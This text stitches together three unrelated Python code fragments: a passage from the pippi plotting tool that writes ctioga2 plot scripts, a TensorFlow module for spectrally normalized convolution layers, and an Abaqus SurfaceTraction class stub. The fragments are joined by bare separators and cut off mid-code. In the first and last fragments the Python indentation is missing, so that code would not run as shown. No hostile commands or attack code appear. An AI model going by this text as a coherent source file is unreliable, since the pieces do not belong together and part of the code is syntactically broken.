' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation +
'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value:
outfile.write(' --legend-line \''+x+'\' /color \'' +
colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Marg.~posterior\' /color \'' +
colours.value.legendTextColour2D+'\'\\\n')
if bestFitOnPost.value:
# Get best-fit point and plot it
bestFit = getCentralVal(dirs.parseFilename, plot, 'like', lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' ' +
colours.value.mainBestFitMarker+' /fill-color \''+str(colours.value.mainBestFitColour2D)+'\' /stroke-color \''+str(colours.value.mainBestFitColourOutline2D) +
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnPost.value:
# Get posterior mean and plot it
postMean = getCentralVal(dirs.parseFilename, plot, 'post', lookupKeys)
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' ' +
colours.value.mainPostMeanMarker+' /fill-color \''+str(colours.value.mainPostMeanColour2D)+'\' /stroke-color \''+str(colours.value.mainPostMeanColourOutline2D) +
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef:
outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(
blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate +
' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(
' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
for x in ['top', 'bottom', 'left', 'right']:
outfile.write(' --axis-style '+x+' /stroke_color \'' +
colours.value.axisColour2D+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
# Do labelling for colourbar
outfile.write(' --y2 --plot '+currentParse +
'_post2D.ct2@1:2:3 /fill-transparency 1\\\n')
outfile.write(' --axis-style y /decoration ticks --yrange ' +
str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \''+postColourbarString +
'\' /shift 3.5 /angle 180 /scale 0.8\\\n')
outfile.close
subprocess.call('chmod +x '+currentBase+'_post2D.bsh', shell=True)
# Make observable plotting scripts
#if doObservable.value:
if obsPlots.value is not None:
for column in obsPlots.value:
# Get contours
if contours2D.value is not None:
contourLevelsLike = getContours(dirs.parseFilename, plot, 'like')
contourLevelsObs = getContours_obs(dirs.parseFilename, plot, column)
# Determine keys
keyString = ''
if doKey2D.value is not None and plot in doKey2D.value:
# Get gross key location
try:
keyLoc = keyLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
keyLoc = defaultKeyLocation
# Get text to be used for reference point
refText = defaultRefKey if refKey.value is None else refKey.value
# Get x and y coordinates for 3 possible keys (for markers and text)
yVals = ytrema[0] + np.array(keyYVals[keyLoc[0]])*yRange
xVals = xtrema[0] + np.array(keyXVals[keyLoc[1]])*xRange
markers = []
# Get details of key for reference point
if plotRef:
markers.append([colours.value.referenceMarkerOuter,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterColour,
colours.value.referenceMarkerOuterScale,
refText,
colours.value.referenceMarkerInner,
colours.value.referenceMarkerInnerColour,
colours.value.referenceMarkerInnerScale/colours.value.referenceMarkerOuterScale])
# Get details of key for posterior mean
if postMeanOnProf.value:
markers.append([colours.value.mainPostMeanMarker,
colours.value.mainPostMeanColour2D,
colours.value.mainPostMeanColourOutline2D,
colours.value.mainPostMeanMarkerScale,
'Mean'])
# Get details of key for best fit
if bestFitOnProf.value:
markers.append([colours.value.mainBestFitMarker,
colours.value.mainBestFitColour2D,
colours.value.mainBestFitColourOutline2D,
colours.value.mainBestFitMarkerScale,
'Best fit'])
# Reverse vertical ordering if keys are to be placed at the top of the page, so as to fill from the top down
if keyLoc[0] == 't':
markers.reverse()
# Construct ctioga2 command for each key
for i, key in enumerate(markers):
if key[0] == 'Bullet' or key[0] == 'BulletOpen':
key[3] /= 1.5
if key[3] > 1.0:
key[3] = 1.0
# Write the extra marker overlay for the reference point
if len(key) == 8:
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[5]+' /color \'' +\
key[6]+'\' /scale '+str(key[7]*key[3])+'\\\n'
# Write the main marker
keyString += ' --draw-marker '+str(xVals[0])+','+str(yVals[i])+' '+key[0]+' /fill-color \''+str(
key[1])+'\' /stroke-color \''+str(key[2])+'\' /scale '+str(key[3])+'\\\n'
# Write the key text
keyString += ' --draw-text ' + \
str(xVals[1])+','+str(yVals[i])+' \''+key[4] + \
'\' /color \''+colours.value.keyTextColour2D
keyString += '\' /justification left /scale 0.75 /alignment center \\\n'
# Open plotting shell script file for writing
outfile = smart_open(currentBase+'_obs2D_'+str(column)+'.bsh', 'w')
outfile.write('#!/usr/bin/env bash\n')
outfile.write('# This plot script created by pippi '+pippiVersion +
' on '+datetime.datetime.now().strftime('%c')+'\n')
outfile.write('ctioga2\\\n')
outfile.write(' --name '+currentBaseMinimal+'_obs2D_'+str(column))
outfile.write(' --plot-scale \''+str(plot_scale)+'\'\\\n')
outfile.write(' --page-size \''+plotSizeInternal+'\'\\\n')
if doColourbar.value is not None and plot in doColourbar.value:
outfile.write(' --frame-margins '+str(left_margin+0.03)+','
+ str(right_margin+0.15)+','
+ str(top_margin)+','
+ str(bottom_margin)+'\\\n')
else:
outfile.write(' --frame-margins '+str(left_margin+0.05)+','
+ str(right_margin+0.02)+','
+ str(top_margin)+','
+ str(bottom_margin)+'\\\n')
outfile.write(
' --xrange '+str(xtrema[0])+':'+str(xtrema[1])+'\\\n')
outfile.write(
' --yrange '+str(ytrema[0])+':'+str(ytrema[1])+'\\\n')
outfile.write(' --ylabel \'' +
labels.value[plot[1]]+'\' /shift 2.9\\\n')
outfile.write(' --xlabel \''+labels.value[plot[0]]+'\'\\\n')
outfile.write(
' --label-style x /scale 1.0 /shift 0.15 --label-style y /scale 1.0 /shift 0.75')
if yAxisAngle.value is not None:
outfile.write(' /angle '+str(yAxisAngle.value))
outfile.write(" /valign 'midheight'")
outfile.write('\\\n --xyz-map\\\n')
outfile.write(' --plot '+currentParse +
'_obs2D_'+str(column)+'.ct2@1:2:3 ')
#if doColourbar.value is not None and plot in doColourbar.value: outfile.write('/zaxis zvalues ')
outfile.write(
'/color-map \''+colours.value.colourMap(contourLevelsObs, 'obs')+'\'\\\n')
if doComparison.value:
# Do everything for comparison chain
if contours2D.value is not None:
# Plot contours
outfile.write(' --plot '+currentSecParse +
'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
for contour in contourLevels:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.comparisonProfContourColour2D +
' /style '+colours.value.comparisonContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if bestFitOnProf.value and colours.value.comparisonBestFitMarker is not None:
# Get best-fit point and plot it
bestFit = getCentralVal(
dirs.secParseFilename, plot, 'like', lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' ' +
colours.value.comparisonBestFitMarker+' /color \''+colours.value.comparisonBestFitColour +
'\' /scale '+str(colours.value.comparisonBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value and colours.value.comparisonPostMeanMarker is not None:
# Get posterior mean and plot it
postMean = getCentralVal(
dirs.secParseFilename, plot, 'post', lookupKeys)
if not postMean:
sys.exit(
'Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' ' +
colours.value.comparisonPostMeanMarker+' /color \''+colours.value.comparisonPostMeanColour +
'\' /scale '+str(colours.value.comparisonPostMeanMarkerScale)+' \\\n')
outfile.write(' --plot '+currentParse +
'_like2D.ct2@1:2:3 /fill-transparency 1\\\n')
if contours2D.value is not None:
# Plot contours
for contour in contourLevelsLike:
outfile.write(' --draw-contour '+contour+' /color '+colours.value.mainProfContourColour2D +
' /style '+colours.value.mainContourStyle+' /width '+colours.value.lineWidth2D+'\\\n')
if doLegend2D.value is not None and plot in doLegend2D.value:
# Write legend
try:
legendLocation = legendLoc2D.value[plot[0]][plot[1]]
except (KeyError, TypeError):
legendLocation = defaultLegendLocation
outfile.write(' --legend-inside \''+legendLocation +
'\' /scale 1.0 /vpadding 0.1\\\n')
if legendLines.value is not None:
for x in legendLines.value:
outfile.write(' --legend-line \''+x+'\' /color \'' +
colours.value.legendTextColour2D+'\'\\\n')
outfile.write(' --legend-line \'Prof.~likelihood\' /color \'' +
colours.value.legendTextColour2D+'\'\\\n')
if bestFitOnProf.value:
# Get best-fit point and plot it
bestFit = getCentralVal(
dirs.parseFilename, plot, 'like', lookupKeys)
outfile.write(' --draw-marker '+str(bestFit[0])+','+str(bestFit[1])+' ' +
colours.value.mainBestFitMarker+' /fill-color \''+str(colours.value.mainBestFitColour2D)+'\' /stroke-color \''+str(colours.value.mainBestFitColourOutline2D) +
'\' /scale '+str(colours.value.mainBestFitMarkerScale)+' \\\n')
if postMeanOnProf.value:
# Get posterior mean and plot it
postMean = getCentralVal(
dirs.parseFilename, plot, 'post', lookupKeys)
if not postMean:
sys.exit(
'Error: plot_posterior_mean_on_profile_like = T but no multiplicity given!')
outfile.write(' --draw-marker '+str(postMean[0])+','+str(postMean[1])+' ' +
colours.value.mainPostMeanMarker+' /fill-color \''+str(colours.value.mainPostMeanColour2D)+'\' /stroke-color \''+str(colours.value.mainPostMeanColourOutline2D) +
'\' /scale '+str(colours.value.mainPostMeanMarkerScale)+' \\\n')
# Plot reference point
if plotRef:
outfile.write(refString)
# Draw key
outfile.write(keyString)
# Write credits
if blame.value is not None:
blameYCoordinate = str(
blameFractionalVerticalOffset * yRange + ytrema[1])
outfile.write(' --draw-text '+str(xtrema[1])+','+blameYCoordinate +
' \''+blame.value+'\' /scale 0.5 /justification right\\\n')
# Add logo
if logoFile.value is not None:
outfile.write(
' --draw-text '+str(logoCoords[0])+','+str(logoCoords[1])+' '+logoString+'\\\n')
# Set axis colours
| |
# Source repository: kshmelkov/gan_evaluation
import tensorflow as tf
slim = tf.contrib.slim
from tensorflow.contrib.framework.python.ops import add_arg_scope
from utils.slim_utils import _build_variable_getter, _add_variable_to_collections, convert_data_format
from tensorflow.python.ops import nn_ops
@add_arg_scope
def convolution(inputs,
                num_outputs,
                kernel_size=[3, 3],
                spectral_normalization=False,
                stride=1,
                padding='SAME',
                data_format=None,
                rate=1,
                activation_fn=tf.nn.relu,
                normalizer_fn=None,
                normalizer_params=None,
                weights_initializer=tf.contrib.layers.xavier_initializer(),
                weights_regularizer=None,
                biases_initializer=tf.zeros_initializer(),
                biases_regularizer=None,
                reuse=None,
                variables_collections=None,
                outputs_collections=None,
                trainable=True,
                scope=None):
    """Adds an N-D convolution followed by an optional batch_norm layer.

    It is required that 1 <= N <= 3.

    `convolution` creates a variable called `weights`, representing the
    convolutional kernel, that is convolved (actually cross-correlated) with the
    `inputs` to produce a `Tensor` of activations. If a `normalizer_fn` is
    provided (such as `batch_norm`), it is then applied. Otherwise, if
    `normalizer_fn` is None and a `biases_initializer` is provided then a `biases`
    variable would be created and added the activations. Finally, if
    `activation_fn` is not `None`, it is applied to the activations as well.

    Performs atrous convolution with input stride/dilation rate equal to `rate`
    if a value > 1 for any dimension of `rate` is specified. In this case
    `stride` values != 1 are not supported.

    Args:
      inputs: A Tensor of rank N+2 of shape
        `[batch_size] + input_spatial_shape + [in_channels]` if data_format does
        not start with "NC" (default), or
        `[batch_size, in_channels] + input_spatial_shape` if data_format starts
        with "NC".
      num_outputs: Integer, the number of output filters.
      kernel_size: A sequence of N positive integers specifying the spatial
        dimensions of the filters. Can be a single integer to specify the same
        value for all spatial dimensions.
      spectral_normalization: Whether to spectrally normalize the kernel, i.e.
        divide it by an estimate of its largest singular value (see
        `spectral_normed_weight`). The default value is False.
      stride: A sequence of N positive integers specifying the stride at which to
        compute output. Can be a single integer to specify the same value for all
        spatial dimensions. Specifying any `stride` value != 1 is incompatible
        with specifying any `rate` value != 1.
      padding: One of `"VALID"` or `"SAME"`.
      data_format: A string or None. Specifies whether the channel dimension of
        the `input` and output is the last dimension (default, or if `data_format`
        does not start with "NC"), or the second dimension (if `data_format`
        starts with "NC"). For N=1, the valid values are "NWC" (default) and
        "NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
        For N=3, the valid values are "NDHWC" (default) and "NCDHW".
      rate: A sequence of N positive integers specifying the dilation rate to use
        for atrous convolution. Can be a single integer to specify the same
        value for all spatial dimensions. Specifying any `rate` value != 1 is
        incompatible with specifying any `stride` value != 1.
      activation_fn: Activation function. The default value is a ReLU function.
        Explicitly set it to None to skip it and maintain a linear activation.
      normalizer_fn: Normalization function to use instead of `biases`. If
        `normalizer_fn` is provided then `biases_initializer` and
        `biases_regularizer` are ignored and `biases` are not created nor added.
        default set to None for no normalizer function
      normalizer_params: Normalization function parameters.
      weights_initializer: An initializer for the weights.
      weights_regularizer: Optional regularizer for the weights.
      biases_initializer: An initializer for the biases. If None skip biases.
      biases_regularizer: Optional regularizer for the biases.
      reuse: Whether or not the layer and its variables should be reused. To be
        able to reuse the layer scope must be given.
      variables_collections: Optional list of collections for all the variables or
        a dictionary containing a different list of collection per variable.
      outputs_collections: Collection to add the outputs.
      trainable: If `True` also add variables to the graph collection
        `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
      scope: Optional scope for `variable_scope`.

    Returns:
      A tensor representing the output of the operation.

    Raises:
      ValueError: If `data_format` is invalid.
      ValueError: Both 'rate' and `stride` are not uniformly 1.
    """
    if data_format not in [None, 'NWC', 'NCW', 'NHWC', 'NCHW', 'NDHWC', 'NCDHW']:
        raise ValueError('Invalid data_format: %r' % (data_format,))

    # Map Keras-style 'kernel'/'bias' variable names onto slim's
    # 'weights'/'biases' names so variable lookup/collections stay consistent.
    layer_variable_getter = _build_variable_getter(
        {'bias': 'biases', 'kernel': 'weights'})

    with tf.variable_scope(
            scope, 'Conv', [inputs], reuse=reuse,
            custom_getter=layer_variable_getter) as sc:
        inputs = tf.convert_to_tensor(inputs)
        input_rank = inputs.get_shape().ndims

        # NOTE(review): despite the N-D docstring, only rank-4 (2-D conv)
        # inputs are supported by this implementation.
        if input_rank != 4:
            raise ValueError('Invalid input rank: %i' % (input_rank,))

        df = ('channels_first' if data_format and data_format.startswith('NC')
              else 'channels_last')
        layer = SpectralNormalizedConvolution2D(
            filters=num_outputs,
            kernel_size=kernel_size,
            spectral_normalization=spectral_normalization,
            strides=stride,
            padding=padding,
            data_format=df,
            dilation_rate=rate,
            activation=None,
            # Bias is skipped when a normalizer is used (biases are ignored in
            # that case, per the docstring) or when no initializer is given.
            use_bias=not normalizer_fn and biases_initializer,
            kernel_initializer=weights_initializer,
            bias_initializer=biases_initializer,
            kernel_regularizer=weights_regularizer,
            bias_regularizer=biases_regularizer,
            activity_regularizer=None,
            trainable=trainable,
            name=sc.name,
            dtype=inputs.dtype.base_dtype,
            _scope=sc,
            _reuse=reuse)
        outputs = layer.apply(inputs)

        # Add variables to collections.
        _add_variable_to_collections(layer.kernel, variables_collections, 'weights')
        if layer.use_bias:
            _add_variable_to_collections(layer.bias, variables_collections, 'biases')

        # Normalizer replaces the bias term; the activation is applied last,
        # matching slim's conv -> normalizer -> activation ordering.
        if normalizer_fn is not None:
            normalizer_params = normalizer_params or {}
            outputs = normalizer_fn(outputs, **normalizer_params)

        if activation_fn is not None:
            outputs = activation_fn(outputs)
        return slim.utils.collect_named_outputs(outputs_collections, sc.name, outputs)
# Sentinel for `update_collection`: pass NO_OPS to skip registering the
# power-iteration update of `u` in any collection — useful on the second call
# of a discriminator, when the update op was already collected on the first.
NO_OPS = 'NO_OPS'
def spectral_normed_weight(W, u=None, num_iters=1, update_collection=None, with_sigma=False):
    """Return W divided by an estimate of its largest singular value (sigma).

    The estimate is obtained by `num_iters` steps of power iteration on the
    matrix obtained by flattening W to [-1, W.shape[-1]] (usually 1 iteration
    is enough). `u` is the persistent left/right-vector variable; if None, a
    non-trainable variable named "u" is created in the current scope.

    If `update_collection` is None, the update of `u` runs as a control
    dependency on every execution; if it is a collection name, the assign op
    is added to that collection instead (pass NO_OPS to skip it entirely).
    If `with_sigma` is True, returns (W_bar, sigma) instead of just W_bar.
    """
    shape = W.shape.as_list()
    W_mat = tf.reshape(W, [-1, shape[-1]])
    if u is None:
        u = tf.get_variable("u", [1, shape[-1]],
                            initializer=tf.truncated_normal_initializer(),
                            trainable=False)

    def _power_step(i, u_i, v_i):
        # One power-iteration step on the flattened kernel.
        v_next = tf.nn.l2_normalize(tf.matmul(u_i, tf.transpose(W_mat)))
        u_next = tf.nn.l2_normalize(tf.matmul(v_next, W_mat))
        return i + 1, u_next, v_next

    v0 = tf.zeros(dtype=tf.float32, shape=[1, W_mat.shape.as_list()[0]])
    _, u_final, v_final = tf.while_loop(
        cond=lambda i, _u, _v: i < num_iters,
        body=_power_step,
        loop_vars=(tf.constant(0, dtype=tf.int32), u, v0)
    )

    # Rayleigh-quotient estimate of the spectral norm: v^T W u.
    sigma = tf.matmul(tf.matmul(v_final, W_mat), tf.transpose(u_final))[0, 0]
    normalized = W_mat / sigma
    if update_collection is None:
        # Tie the update of u to every use of the normalized weight.
        with tf.control_dependencies([u.assign(u_final)]):
            W_bar = tf.reshape(normalized, shape)
    else:
        W_bar = tf.reshape(normalized, shape)
        # Put NO_OPS to not update any collection. This is useful for the
        # second call of discriminator if the update_op has already been
        # collected on the first call.
        if update_collection != NO_OPS:
            tf.add_to_collection(update_collection, u.assign(u_final))
    return (W_bar, sigma) if with_sigma else W_bar
class SpectralNormalizedConvolution2D(tf.layers.Conv2D):
    """`tf.layers.Conv2D` variant that can spectrally normalize its kernel.

    When `spectral_normalization` is True, the kernel created in `build` is
    replaced by `spectral_normed_weight(kernel)`, i.e. the kernel divided by
    a power-iteration estimate of its largest singular value. All other
    behaviour matches `tf.layers.Conv2D`.
    """

    def __init__(self, filters,
                 kernel_size,
                 spectral_normalization=False,
                 strides=(1, 1),
                 padding='valid',
                 data_format='channels_last',
                 dilation_rate=(1, 1),
                 activation=None,
                 use_bias=True,
                 kernel_initializer=None,
                 bias_initializer=tf.zeros_initializer(),
                 kernel_regularizer=None,
                 bias_regularizer=None,
                 activity_regularizer=None,
                 kernel_constraint=None,
                 bias_constraint=None,
                 trainable=True,
                 name=None,
                 **kwargs):
        # Everything except `spectral_normalization` is forwarded verbatim to
        # the tf.layers.Conv2D base class.
        super(SpectralNormalizedConvolution2D, self).__init__(
            filters=filters,
            kernel_size=kernel_size,
            strides=strides,
            padding=padding,
            data_format=data_format,
            dilation_rate=dilation_rate,
            activation=activation,
            use_bias=use_bias,
            kernel_initializer=kernel_initializer,
            bias_initializer=bias_initializer,
            kernel_regularizer=kernel_regularizer,
            bias_regularizer=bias_regularizer,
            activity_regularizer=activity_regularizer,
            kernel_constraint=kernel_constraint,
            bias_constraint=bias_constraint,
            trainable=trainable,
            name=name, **kwargs)
        # Whether to divide the kernel by its estimated spectral norm.
        self.spectral_normalization = spectral_normalization

    def build(self, input_shape):
        # Mirrors tf.layers.Conv2D.build, with the optional spectral
        # normalization applied right after the kernel variable is created.
        input_shape = tf.TensorShape(input_shape)
        if self.data_format == 'channels_first':
            channel_axis = 1
        else:
            channel_axis = -1
        if input_shape[channel_axis].value is None:
            raise ValueError('The channel dimension of the inputs '
                             'should be defined. Found `None`.')
        input_dim = input_shape[channel_axis].value
        # Kernel layout for a forward conv: (h, w, in_channels, out_channels).
        kernel_shape = self.kernel_size + (input_dim, self.filters)
        self.kernel = self.add_variable(name='kernel',
                                        shape=kernel_shape,
                                        initializer=self.kernel_initializer,
                                        regularizer=self.kernel_regularizer,
                                        constraint=self.kernel_constraint,
                                        trainable=True,
                                        dtype=self.dtype)
        if self.spectral_normalization:
            # TODO pass update_collection?
            vs = tf.get_variable_scope()
            # Under variable reuse (e.g. a discriminator's second call), skip
            # collecting the u-update op again.
            upd_coll = None if not vs.reuse else NO_OPS
            # print("update collection = ", upd_coll)
            self.kernel = spectral_normed_weight(self.kernel, update_collection=upd_coll)
        if self.use_bias:
            self.bias = self.add_variable(name='bias',
                                          shape=(self.filters,),
                                          initializer=self.bias_initializer,
                                          regularizer=self.bias_regularizer,
                                          constraint=self.bias_constraint,
                                          trainable=True,
                                          dtype=self.dtype)
        else:
            self.bias = None
        self.input_spec = tf.layers.InputSpec(ndim=self.rank + 2,
                                              axes={channel_axis: input_dim})
        # Pre-build the C-level convolution op for the known input shape.
        self._convolution_op = nn_ops.Convolution(
            input_shape,
            filter_shape=self.kernel.get_shape(),
            dilation_rate=self.dilation_rate,
            strides=self.strides,
            padding=self.padding.upper(),
            data_format=convert_data_format(self.data_format,
                                            self.rank + 2))
        self.built = True
class SpectralNormalizedConvolution2DTranspose(tf.layers.Conv2DTranspose):
    """`tf.layers.Conv2DTranspose` variant with optional spectral normalization.

    When `spectral_normalization` is True, the kernel created in `build` is
    replaced by `spectral_normed_weight(kernel)`, i.e. the kernel divided by
    a power-iteration estimate of its largest singular value. All other
    behaviour matches `tf.layers.Conv2DTranspose`.
    """

    def __init__(self, filters,
                 kernel_size,
                 spectral_normalization=False,
                 strides=(1, 1),
                 padding='valid',
                 data_format='channels_last',
                 dilation_rate=(1, 1),
                 activation=None,
                 use_bias=True,
                 kernel_initializer=None,
                 bias_initializer=tf.zeros_initializer(),
                 kernel_regularizer=None,
                 bias_regularizer=None,
                 activity_regularizer=None,
                 kernel_constraint=None,
                 bias_constraint=None,
                 trainable=True,
                 name=None,
                 **kwargs):
        # Everything except `spectral_normalization` is forwarded verbatim to
        # the tf.layers.Conv2DTranspose base class.
        super(SpectralNormalizedConvolution2DTranspose, self).__init__(
            filters=filters,
            kernel_size=kernel_size,
            strides=strides,
            padding=padding,
            data_format=data_format,
            dilation_rate=dilation_rate,
            activation=activation,
            use_bias=use_bias,
            kernel_initializer=kernel_initializer,
            bias_initializer=bias_initializer,
            kernel_regularizer=kernel_regularizer,
            bias_regularizer=bias_regularizer,
            activity_regularizer=activity_regularizer,
            kernel_constraint=kernel_constraint,
            bias_constraint=bias_constraint,
            trainable=trainable,
            name=name, **kwargs)
        # Whether to divide the kernel by its estimated spectral norm.
        self.spectral_normalization = spectral_normalization

    def build(self, input_shape):
        # Normalize to a TensorShape so dimensions can be inspected uniformly,
        # consistent with SpectralNormalizedConvolution2D.build.
        input_shape = tf.TensorShape(input_shape)
        if len(input_shape) != 4:
            raise ValueError('Inputs should have rank 4. Received input shape: ' +
                             str(input_shape))
        if self.data_format == 'channels_first':
            channel_axis = 1
        else:
            channel_axis = -1
        # Fix: indexing a TensorShape yields a Dimension object, which is
        # never `is None` even when the dimension is unknown — the previous
        # `input_shape[channel_axis] is None` check could never fire. Compare
        # the Dimension's .value instead (as the Conv2D sibling class does).
        if input_shape[channel_axis].value is None:
            raise ValueError('The channel dimension of the inputs '
                             'should be defined. Found `None`.')
        input_dim = input_shape[channel_axis].value
        self.input_spec = tf.layers.InputSpec(ndim=4, axes={channel_axis: input_dim})
        # Kernel layout for a transposed conv: (h, w, out_channels, in_channels).
        kernel_shape = self.kernel_size + (self.filters, input_dim)
        self.kernel = self.add_variable(name='kernel',
                                        shape=kernel_shape,
                                        initializer=self.kernel_initializer,
                                        regularizer=self.kernel_regularizer,
                                        constraint=self.kernel_constraint,
                                        trainable=True,
                                        dtype=self.dtype)
        if self.spectral_normalization:
            # TODO pass update_collection?
            vs = tf.get_variable_scope()
            # Under variable reuse, skip collecting the u-update op again.
            upd_coll = None if not vs.reuse else NO_OPS
            self.kernel = spectral_normed_weight(self.kernel, update_collection=upd_coll)
        if self.use_bias:
            self.bias = self.add_variable(name='bias',
                                          shape=(self.filters,),
                                          initializer=self.bias_initializer,
                                          regularizer=self.bias_regularizer,
                                          constraint=self.bias_constraint,
                                          trainable=True,
                                          dtype=self.dtype)
        else:
            self.bias = None
        self.built = True
@add_arg_scope
def convolution2d_transpose(
inputs,
num_outputs,
kernel_size,
stride=1,
spectral_normalization=False,
padding='SAME',
data_format='NHWC',
activation_fn=tf.nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=tf.zeros_initializer(),
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a convolution2d_transpose with an optional batch normalization layer.
The function creates a variable called `weights`, representing the
kernel, that is convolved with the input. If `normalizer_fn` is `None`, a
second variable called 'biases' is added to the result of the operation.
Args:
inputs: A 4-D `Tensor` of type `float` and shape
`[batch, height, width, | |
import typing
from abaqusConstants import *
from .Load import Load
from ..Region.Region import Region
class SurfaceTraction(Load):
"""The SurfaceTraction object defines surface traction on a region.
The SurfaceTraction object is derived from the Load object.
Attributes
----------
name: str
A String specifying the load repository key.
angle: float
A Float specifying an additional rotation of **directionVector** about an axis. The
default value is 0.0.
axis: SymbolicConstant
A SymbolicConstant specifying the axis about which to apply an additional rotation of
**directionVector**. Possible values are AXIS_1, AXIS_2, and AXIS_3. The default value is
AXIS_1.
follower: Boolean
A Boolean specifying whether the direction of the force changes with rotation. The
default value is ON.This parameter may be modified only if **traction** is GENERAL. You
should provide the **follower** argument only if it is valid for the specified step.
resultant: Boolean
A Boolean specifying whether the to maintain a constant resultant force by defining
traction per unit undeformed area. If **resultant** is OFF, traction is defined per unit
deformed area. The default value is OFF.You should provide the **resultant** argument only
if it is valid for the specified step.
traction: SymbolicConstant
A SymbolicConstant specifying how to apply surface traction. Possible values are SHEAR
and GENERAL. The default value is SHEAR.
distributionType: SymbolicConstant
A SymbolicConstant specifying how the surface traction is distributed spatially.
Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
field: str
A String specifying the name of the :py:class:`~abaqus.Field.AnalyticalField.AnalyticalField` object associated with this load.
The **field** argument applies only when **distributionType=FIELD**. The default value is an
empty string.
userCsys: str
A String specifying a CSYS defined by a user-subroutine. If **userCsys=None**, the degrees
of freedom are defined in the global coordinate system or by the **localCsys** parameter
if defined. The default value is "None".
localCsys: int
None or a :py:class:`~abaqus.Datum.DatumCsys.DatumCsys` object specifying the local coordinate system of the load's degrees
of freedom. If **localCsys=None**, the degrees of freedom are defined in the global
coordinate system or by the **userCsys** parameter if defined. When this member is
queried, it returns an Int. The default value is None.
directionVector: tuple
A :py:class:`~abaqus.BasicGeometry.VertexArray.VertexArray` object of length 2 specifying the direction of the load. Instead of
through a ConstrainedSketchVertex, each point may be specified through a tuple of coordinates. If
**traction** is SHEAR, then **directionVector** will be projected onto the region surface.
This parameter is available only if **traction** is GENERAL or SHEAR.
region: Region
A :py:class:`~abaqus.Region.Region.Region` object specifying the region to which the load is applied.
Notes
-----
This object can be accessed by:
.. code-block:: python
import load
mdb.models[name].loads[name]
"""
# A String specifying the load repository key.
name: str = ''
# A Float specifying an additional rotation of *directionVector* about an axis. The
# default value is 0.0.
angle: float = 0
# A SymbolicConstant specifying the axis about which to apply an additional rotation of
# *directionVector*. Possible values are AXIS_1, AXIS_2, and AXIS_3. The default value is
# AXIS_1.
axis: SymbolicConstant = AXIS_1
# A Boolean specifying whether the direction of the force changes with rotation. The
# default value is ON. This parameter may be modified only if *traction* is GENERAL. You
# should provide the *follower* argument only if it is valid for the specified step.
follower: Boolean = ON
# A Boolean specifying whether to maintain a constant resultant force by defining
# traction per unit undeformed area. If *resultant* is OFF, traction is defined per unit
# deformed area. The default value is OFF. You should provide the *resultant* argument only
# if it is valid for the specified step.
resultant: Boolean = OFF
# A SymbolicConstant specifying how to apply surface traction. Possible values are SHEAR
# and GENERAL. The default value is SHEAR.
traction: SymbolicConstant = SHEAR
# A SymbolicConstant specifying how the surface traction is distributed spatially.
# Possible values are UNIFORM, USER_DEFINED, and FIELD. The default value is UNIFORM.
distributionType: SymbolicConstant = UNIFORM
# A String specifying the name of the AnalyticalField object associated with this load.
# The *field* argument applies only when *distributionType*=FIELD. The default value is an
# empty string.
field: str = ''
# A String specifying a CSYS defined by a user-subroutine. If *userCsys*=None, the degrees
# of freedom are defined in the global coordinate system or by the *localCsys* parameter
# if defined. The default value is "None".
userCsys: str = ''
# None or a DatumCsys object specifying the local coordinate system of the load's degrees
# of freedom. If *localCsys*=None, the degrees of freedom are defined in the global
# coordinate system or by the *userCsys* parameter if defined. When this member is
# queried, it returns an Int. The default value is None.
localCsys: int = None
# A VertexArray object of length 2 specifying the direction of the load. Instead of
# through a ConstrainedSketchVertex, each point may be specified through a tuple of coordinates. If
# *traction* is SHEAR, then *directionVector* will be projected onto the region surface.
# This parameter is available only if *traction* is GENERAL or SHEAR.
directionVector: tuple = ()
# A Region object specifying the region to which the load is applied.
region: Region = Region()
def __init__(self, name: str, createStepName: str, region: Region, magnitude: float,
distributionType: SymbolicConstant = UNIFORM, field: str = '', amplitude: str = UNSET,
angle: float = 0, axis: SymbolicConstant = AXIS_1, localCsys: int = None,
userCsys: str = '', directionVector: tuple = (), follower: Boolean = ON,
resultant: Boolean = OFF, traction: SymbolicConstant = SHEAR):
"""This method creates a SurfaceTraction object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].SurfaceTraction
Parameters
----------
name
A String specifying the load repository key.
createStepName
A String specifying the name of the step in which the load is created.
region
A Region object specifying the region to which the load is applied.
magnitude
A Float or Complex specifying the load magnitude. *magnitude* is optional if
